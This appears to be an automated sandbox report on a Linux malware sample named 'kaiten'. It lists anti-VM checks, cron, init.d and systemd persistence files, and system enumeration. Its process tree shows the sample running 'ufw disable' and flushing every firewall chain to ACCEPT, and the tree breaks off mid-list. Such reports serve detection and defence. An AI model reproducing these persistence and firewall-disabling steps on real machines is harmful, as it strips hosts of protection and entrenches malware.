kaiten | f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712

description	ioc	Process
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	grep

Checks hardware identifiers (DMI) 1 TTPs 8 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent

Creates/modifies Cron job 1 TTPs 17 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

description	ioc	Process
File opened for modification	/etc/cron.monthly/.lib-knlib4	Process not Found
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/etc/cron.daily/sedfxjXw7	sed
File opened for modification	/etc/cron.hourly/.lib-knlib4	Process not Found
File opened for modification	/etc/cron.daily/.lib-knlib4	Process not Found
File opened for modification	/etc/cron.hourly/pwnrig	tee
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.monthly/sedvBJup8	sed
File opened for modification	/var/spool/cron/.lib-knlib4	Process not Found
File opened for modification	/etc/cron.hourly/sedniW0w7	sed
File opened for modification	/etc/cron.weekly/.lib-knlib4	Process not Found
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/etc/cron.daily/pwnrig	tee
File opened for modification	/etc/cron.d/sedmQib26	sed
File opened for modification	/etc/cron.weekly/sedehBdc6	sed
File opened for modification	/var/spool/cron/crontabs/tmp.cmc4Yl	crontab
File opened for modification	/etc/cron.d/.lib-knlib4	Process not Found

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 1 TTPs 3 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

description	ioc	Process
File opened for modification	/etc/init.d/knlib	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/sedlxQlmY	sed

Modifies systemd 1 TTPs 3 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence

Boot or Logon Autostart Execution

description	ioc	Process
File opened for modification	/etc/systemd/system/knlibe.service	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service	tee

Reads CPU attributes 1 TTPs 16 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	service-agent
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	service-agent
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps

Reads hardware information 1 TTPs 28 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version	service-agent

Writes file to system bin folder 1 TTPs 5 IoCs

Hijack Execution Flow

description	ioc	Process
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/sysdr	cp
File opened for modification	/bin/knlib5	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for modification	/bin/bprofr	cp

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	service-agent
File opened for reading	/sys/kernel/mm/hugepages	service-agent
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_latency	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	service-agent
File opened for reading	/sys/bus/node/devices/node0/meminfo	service-agent
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	service-agent
File opened for reading	/sys/bus/cpu/devices	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	service-agent
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	service-agent
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	service-agent
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	service-agent
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	service-agent
File opened for reading	/sys/bus/dax/devices	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	service-agent
File opened for reading	/sys/bus/dax/devices	service-agent
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	service-agent
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	service-agent
File opened for reading	/sys/bus/node/devices/node0/cpumap	service-agent
File opened for reading	/sys/bus/node/devices/node0/hugepages	service-agent
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	service-agent
File opened for reading	/sys/devices/system/node/online	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	service-agent
File opened for reading	/sys/bus/dax/target_node	service-agent
File opened for reading	/sys/devices/virtual/dmi/id	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	service-agent
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	service-agent
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	service-agent
File opened for reading	/sys/module/ip6_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/200/cmdline	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/2191/cmdline	ps
File opened for reading	/proc/86/status	pgrep
File opened for reading	/proc/2067/cmdline	ps
File opened for reading	/proc/614/status	ps
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/8/cmdline	ps
File opened for reading	/proc/88/cmdline	ps
File opened for reading	/proc/992/stat	ps
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/1152/status	ps
File opened for reading	/proc/1398/cmdline	pgrep
File opened for reading	/proc/1574/status	pgrep
File opened for reading	/proc/811/stat	ps
File opened for reading	/proc/167/cmdline	pgrep
File opened for reading	/proc/1170/stat	ps
File opened for reading	/proc/1519/stat	ps
File opened for reading	/proc/4/cmdline	ps
File opened for reading	/proc/176/cmdline	pkill
File opened for reading	/proc/270/status	ps
File opened for reading	/proc/440/status	ps
File opened for reading	/proc/159/cmdline	ps
File opened for reading	/proc/926/cmdline	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/267/cmdline	pkill
File opened for reading	/proc/1454/stat	ps
File opened for reading	/proc/201/status	pgrep
File opened for reading	/proc/676/cmdline	pgrep
File opened for reading	/proc/7/stat	ps
File opened for reading	/proc/2068/stat	ps
File opened for reading	/proc/571/status	pgrep
File opened for reading	/proc/1103/status	ps
File opened for reading	/proc/1843/status	ps
File opened for reading	/proc/140/cmdline	ps
File opened for reading	/proc/1432/cmdline	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/448/stat	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/616/status	pgrep
File opened for reading	/proc/587/stat	ps
File opened for reading	/proc/1315/cmdline	pgrep
File opened for reading	/proc/670/status	pkill
File opened for reading	/proc/1474/stat	ps
File opened for reading	/proc/1301/stat	ps
File opened for reading	/proc/1560/stat	ps
File opened for reading	/proc/580/status	ps
File opened for reading	/proc/159/cmdline	pgrep
File opened for reading	/proc/1432/status	ps
File opened for reading	/proc/830/stat	ps
File opened for reading	/proc/1414/stat	ps
File opened for reading	/proc/270/stat	ps
File opened for reading	/proc/484/stat	ps
File opened for reading	/proc/830/status	pkill
File opened for reading	/proc/1103/stat	ps
File opened for reading	/proc/950/cmdline	pgrep
File opened for reading	/proc/105/stat	ps
File opened for reading	/proc/89/cmdline	ps
File opened for reading	/proc/267/status	ps
File opened for reading	/proc/1438/status	pgrep
File opened for reading	/proc/173/status	ps
File opened for reading	/proc/1077/status	pkill
File opened for reading	/proc/1194/cmdline	pgrep
File opened for reading	/proc/167/cmdline	pkill

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.bashirc	sys-helper
File opened for modification	/tmp/service-agent	Process not Found
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/.lock	service-agent
File opened for modification	/tmp/sys-helper	Process not Found

/tmp/f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
/tmp/f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
1⤵
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Enumerates kernel/hardware configuration
PID:1479
- /usr/bin/bash
  bash -c "ufw disable"
  2⤵
  PID:1503
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1503
- - /usr/sbin/iptables
    /usr/sbin/iptables -V
    3⤵
    PID:1521
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1522
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1523
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        
        PID:1524
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1526
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1530
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1531
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1532
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1533
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1534
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:1535
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1536
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:1537
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:1538
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1539
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:1540
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      PID:1541
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1543
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1544
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1545
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1546
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1548
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1549
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1550
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1551
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1552
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1556
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:1558
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1559
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1563
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1564
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1565
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1566
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1568
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1569
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1570
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1571
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1572
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1573
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1575
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1576
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1577
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1578
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1579
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:1580
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:1581
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1582
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:1583
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1584
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1585
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1586
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1587
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1588
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1589
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1590
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1591
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1592
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1593
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1594
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1595
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1596
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1597
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1598
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1599
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1600
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1601
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1602
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1603
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1604
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1605
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1606
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1607
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1608
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1609
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1610
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1611
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1612
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1613
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1614
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:1615
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1616
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1617
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1618
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1619
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1620
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1621
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1622
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1623
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1624
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1625
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1626
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:1629
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1630
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:1631
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1632
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1633
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1634
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:1635
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1636
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1637
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1638
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1639
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1640
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1641
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1642
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1643
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1644
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1645
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:1646
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1647
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1648
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1649
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1650
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1651
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1652
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1653
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1654
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1655
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1656
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1657
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:1658
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1659
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1660
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1661
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:1662
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:1663
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:1664
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:1665
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      PID:1668
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1669
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1670
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1671
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1672
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1673
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1674
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1675
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1676
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1677
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1678
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1679
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:1680
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1681
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1682
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1683
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1684
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1685
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1687
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1688
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1689
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1691
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1692
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1693
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1694
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1695
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1696
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1698
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1699
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:1700
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1701
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1702
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:1703
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1704
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1705
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
